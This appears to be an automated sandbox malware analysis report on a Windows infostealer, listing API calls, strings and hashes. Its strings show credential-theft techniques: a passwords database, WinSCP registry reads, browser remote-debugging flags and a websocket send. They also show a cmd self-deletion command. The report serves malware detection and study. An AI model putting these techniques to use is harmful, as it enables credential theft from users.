                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$Heap$Free$AllocateDeleteFile
                                                                                                                                                                        • String ID: _passwords.db
                                                                                                                                                                        • API String ID: 3049345645-1485422284
                                                                                                                                                                        • Opcode ID: 742f469a22a5af341631ed651aab7db57a0a93ccf1e1eb72d22d5aadee9c9044
                                                                                                                                                                        • Instruction ID: 24bc4b787eba163100fbfc58756f5204999f887e60b27380e355edf6f9f48f95
                                                                                                                                                                        • Opcode Fuzzy Hash: 742f469a22a5af341631ed651aab7db57a0a93ccf1e1eb72d22d5aadee9c9044
                                                                                                                                                                        • Instruction Fuzzy Hash: 91410579601204AFC704DF68EDD596AB7B8FF986007080065ED05E7371EAB4FE12DB6A

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 505 41b1ae-41b3cc send
                                                                                                                                                                        APIs
                                                                                                                                                                        • send.WS2_32(?,00000000,00000000,00000000), ref: 0041B3B0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: send
                                                                                                                                                                        • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $>XTo$GET $\WTo$lXTo
                                                                                                                                                                        • API String ID: 2809346765-1623567536
                                                                                                                                                                        • Opcode ID: 65df4931d48b84086f5179b24d8c035c8a09bfab35bb16bc1cde2d2915c1e98c
                                                                                                                                                                        • Instruction ID: b7b9db9ffdf1dca5a55e289326cc11070d4408588f9295d6d31fd7d94abdbf18
                                                                                                                                                                        • Opcode Fuzzy Hash: 65df4931d48b84086f5179b24d8c035c8a09bfab35bb16bc1cde2d2915c1e98c
                                                                                                                                                                        • Instruction Fuzzy Hash: DB5120722041109FC328DB5CED91F9B77E9AFD5214F084928F51AD3361EAF4AE14CB5A

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 530 41f999-41fa7a memset lstrcatA * 3 538 41fa80 call 4348f4 530->538 539 41fa80 call 41cb56 530->539 540 41fa80 call 41cd09 530->540 541 41fa80 call 4349be 530->541 542 41fa80 call 43489c 530->542 537 41fa82-41faa3 538->537 539->537 540->537 541->537 542->537
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0041F9A9
                                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0041F9D2
                                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0041F9F0
                                                                                                                                                                        • lstrcatA.KERNEL32(?, --remote-debugging-port=9223 --profile-directory="), ref: 0041FA23
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$memset
                                                                                                                                                                        • String ID: --remote-debugging-port=9223 --profile-directory="$ 0
                                                                                                                                                                        • API String ID: 2788080104-1375269121
                                                                                                                                                                        • Opcode ID: bc3a03154b3e2295211f1e0eed9f91dac7bf6ae7ceb0bffc97bae97d78ff6656
                                                                                                                                                                        • Instruction ID: 114670f2cd88bf99f37d533532433d574fa85a0011b7eefcf1e9e4fcfdc3aaaf
                                                                                                                                                                        • Opcode Fuzzy Hash: bc3a03154b3e2295211f1e0eed9f91dac7bf6ae7ceb0bffc97bae97d78ff6656
                                                                                                                                                                        • Instruction Fuzzy Hash: 62317CB5A002049FDB14DF68DC91B9977F9EF89704F0845AAED06D7320E7B0AE44CB86

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 543 4260e5-4261a9 memset * 4 RegOpenKeyExA
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00426101
                                                                                                                                                                        • memset.MSVCRT ref: 0042611A
                                                                                                                                                                        • memset.MSVCRT ref: 0042612B
                                                                                                                                                                        • memset.MSVCRT ref: 0042613C
                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 00426184
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$Open
                                                                                                                                                                        • String ID: Software\Martin Prikryl\WinSCP 2\Configuration
                                                                                                                                                                        • API String ID: 276825008-2822339690
                                                                                                                                                                        • Opcode ID: df9b1c11c21afe3b4a5a63d76e1ed78569fe613691e4912eca3732ab10c9d118
                                                                                                                                                                        • Instruction ID: c250d11b6629f2eea65e49512af102c608c6350f49251a8cd05842a55814024d
                                                                                                                                                                        • Opcode Fuzzy Hash: df9b1c11c21afe3b4a5a63d76e1ed78569fe613691e4912eca3732ab10c9d118
                                                                                                                                                                        • Instruction Fuzzy Hash: 49116DB2D101286BE7109AA5DC49E9B7EBCEB85358F04042EF508D7241E6B59A44CBE4

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 545 43e4ea-43e785 ShellExecuteEx memset ExitProcess
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExecuteExitProcessShellmemset
                                                                                                                                                                        • String ID: " & exit$/c timeout /t 10 & rd /s /q "C:\ProgramData\
                                                                                                                                                                        • API String ID: 1852908831-902342072
                                                                                                                                                                        • Opcode ID: 46ce48e24009437e21ff09d38671e0a3c0e3ade84f6761fee6b6caae3fc326df
                                                                                                                                                                        • Instruction ID: b4fb451f398911565fd2404722d46166d5db542435d23226fa70abb328fa2d0a
                                                                                                                                                                        • Opcode Fuzzy Hash: 46ce48e24009437e21ff09d38671e0a3c0e3ade84f6761fee6b6caae3fc326df
                                                                                                                                                                        • Instruction Fuzzy Hash: AC710C35B002059FD740CF5CDC88DAA33E9EB8D608B19846AF849C7362EBB4AD148F49

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 581 43e5b7-43e763 ShellExecuteEx memset ExitProcess 596 43e767-43e785 581->596
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExecuteExitProcessShellmemset
                                                                                                                                                                        • String ID: " & exit$/c timeout /t 10 & rd /s /q "C:\ProgramData\
                                                                                                                                                                        • API String ID: 1852908831-902342072
                                                                                                                                                                        • Opcode ID: b2c4268ca961e0fc47ca01dcb69c7324dda417456c1cdf6c9f2e484c6493fceb
                                                                                                                                                                        • Instruction ID: bd544761f7b1dfedf4fb5736016b050abd727cb7d0c45f0a086215749ccf5ae6
                                                                                                                                                                        • Opcode Fuzzy Hash: b2c4268ca961e0fc47ca01dcb69c7324dda417456c1cdf6c9f2e484c6493fceb
                                                                                                                                                                        • Instruction Fuzzy Hash: 1341FA75B002059FD740CF5CDC88DAA33E9EF8D604B19852AF849C7362EBB4AD148F49

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 598 431366-4313b1 RegQueryValueExA 600 4313ba-4313d4 598->600
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,?,?,?,?), ref: 004313AA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                                        • String ID: " $CurrentBuildNumber$^\w$^\w
                                                                                                                                                                        • API String ID: 3660427363-3261598234
                                                                                                                                                                        • Opcode ID: bdee0981f7683c089e8fb0345dc9a6bc8c278a54ce06050ad66f8a61e1657eb1
                                                                                                                                                                        • Instruction ID: 0d34f9e0d8b49bd60d604e6c48f6b3b48a5b9a3a064a98a57d4dcc57e91ac9fb
                                                                                                                                                                        • Opcode Fuzzy Hash: bdee0981f7683c089e8fb0345dc9a6bc8c278a54ce06050ad66f8a61e1657eb1
                                                                                                                                                                        • Instruction Fuzzy Hash: 9CF01879641110BFD214DF44DC89EA5B7BCEF55710F144869F948D7320EA64BC118A66

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 607 42764a-427845 call 43335d 624 427847-4278be StrCmpCA 607->624
                                                                                                                                                                        APIs
                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,firefox), ref: 004278A6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: Stable\$firefox
                                                                                                                                                                        • API String ID: 0-3160656979
                                                                                                                                                                        • Opcode ID: 50adfbb396ac6d38a52d3669ed2107846ae3f003892b1e5c21602bac3e31a4da
                                                                                                                                                                        • Instruction ID: 01410d69d90083381b27eb376952c09bc6d19c9c6413179d456c2d90a18a2a64
                                                                                                                                                                        • Opcode Fuzzy Hash: 50adfbb396ac6d38a52d3669ed2107846ae3f003892b1e5c21602bac3e31a4da
                                                                                                                                                                        • Instruction Fuzzy Hash: 04815D79A005089FCB04DF9CCC80E99B3B5FF88214B08855AEC25DB3A5EBB0ED55CB95

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 629 41f72b-41f845 DeleteFileA 641 41f849-41f871 629->641
                                                                                                                                                                        APIs
                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 0041F83C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
